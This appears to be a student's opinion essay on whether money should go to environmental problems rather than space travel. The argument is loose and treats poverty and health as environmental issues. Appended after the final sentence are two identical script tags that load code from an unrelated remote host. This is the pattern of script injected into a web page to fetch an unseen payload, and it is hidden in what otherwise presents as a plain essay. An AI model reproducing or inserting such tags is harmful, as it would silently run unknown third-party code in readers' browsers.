Space travel is excellent these days, but there are many environmental problems on our planet, We should tackle the problems but not the space travel and spend a lot of money. discuss this opinion.

The growing influence of space travel on our lives has sparked various debates. This issue is especially important as it affects finance of a country, impacting both individual and society as a whole. In this essay, I will discuss the challenges of space exploration and its impacts on different areas of life.

One of the key benefits of space exploration is that it improves the knowledge of space significantly. Studies have revealed that space travel has shown significant opportunities to explore about our earth and its surrounding.

On the other hand, environmental problems on our planet are also significant to consider before investing money on space travel. For example, in many countries people are living a life of poverty. Poor health conditions, lack of educational opportunities, and insufficient food for kids are major concerns in those countries. Hence, we should also pay attention to solve these issues and spend a lot of money to resolve them. Space travel should be second choice in this scenario.

Thus, the environmental problems should be managed carefully to prevent further harm. Overall, space travel presents both opportunities and challenges that require a balance approach. Therefore, it is crucial to find a balance in using money to solve environmental problems and space travel as well.<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>